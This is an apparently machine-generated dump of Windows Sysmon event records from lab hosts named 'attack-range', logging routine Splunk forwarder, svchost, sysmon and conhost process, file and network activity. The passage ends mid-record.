154100x8000000000000000216459Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.379{4F8D34B0-114B-6216-5204-000000003902}2396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000216458Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:47.034{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64ECEA67C30F000A5A76C8BB2E911C22,SHA256=07BDB9F2BF7E5A1851C44CE73B6F080CD312A3A40DE39BB7870D04BEFEC78668,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287582Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:46.699{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53428-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287581Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:48.523{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA08ABC507049919DC3ACF6A7F1A01A2,SHA256=69620F3BE4404BB480F612C949CDCB0191E98669F5AC55485A0AE8A182D86B2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216488Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:48.518{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=834E1F877BD36CAEC03006DAAA3DA083,SHA256=984557636F9A078D9AFEF685A82AFA91887CF7A898E28598A3A2BFB886782AF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216487Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:48.518{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7358BCA387896D9895C05C403E841632,SHA256=ECB47094A95EE82FE0C910B1A1435C8A7272DC75B3260FA2C2465929141B6436,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216486Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:48.081{4F8D34B0-114B-6216-5304-000000003902}6962372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000287583Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:49.538{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94F5970075DDB04A0EF417062E779CDA,SHA256=DB56E4CE876142FFCBC3A263E5537D06C394C5AADA070CE61FBDE36FFC84219D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216516Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.893{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-114D-6216-5504-000000003902}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216515Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.893{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216514Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.893{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216513Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.893{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216512Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.893{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216511Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.893{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216510Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.893{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216509Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.893{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216508Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.893{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216507Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.893{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216506Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.893{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-114D-6216-5504-000000003902}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216505Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.893{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-114D-6216-5504-000000003902}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216504Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.894{4F8D34B0-114D-6216-5504-000000003902}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000216503Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.628{4F8D34B0-114D-6216-5404-000000003902}29881908C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216502Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.393{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-114D-6216-5404-000000003902}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216501Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.393{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216500Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.393{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216499Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.393{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216498Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.393{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216497Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.393{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216496Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.393{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216495Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 